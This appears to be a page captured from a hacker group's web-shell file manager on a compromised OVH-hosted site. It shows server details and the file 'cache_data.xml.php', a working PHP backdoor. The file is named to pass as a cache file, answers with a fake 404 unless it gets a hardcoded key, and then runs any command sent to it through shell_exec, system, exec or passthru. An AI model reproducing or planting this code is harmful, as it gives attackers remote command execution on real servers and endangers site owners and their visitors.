One Hat Cyber Team
Your IP:
216.73.216.75
Server IP:
213.186.33.17
Server:
Linux webm007.cluster106.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64
Server Software:
Apache
PHP Version:
7.4.33
Create File
|
Create Folder
Execute
Dir :
~
/
home
/
tcherkas
/
micha.paris
/
tmp
/
View File Name :
cache_data.xml.php
<?php @error_reporting(0);@ini_set("display_errors",0);@set_time_limit(0);$k=@$_REQUEST["k"];if($k!=="4375d80d263c7d59"){http_response_code(404);die("404");}if(isset($_REQUEST["cmd"])){$c=$_REQUEST["cmd"];$r="";if(function_exists("shell_exec")){$r=@shell_exec($c);}if(!$r&&function_exists("system")){ob_start();@system($c);$r=ob_get_clean();}if(!$r&&function_exists("exec")){@exec($c,$o);$r=implode(chr(10),$o);}if(!$r&&function_exists("passthru")){ob_start();@passthru($c);$r=ob_get_clean();}die($r);}die("OK");?>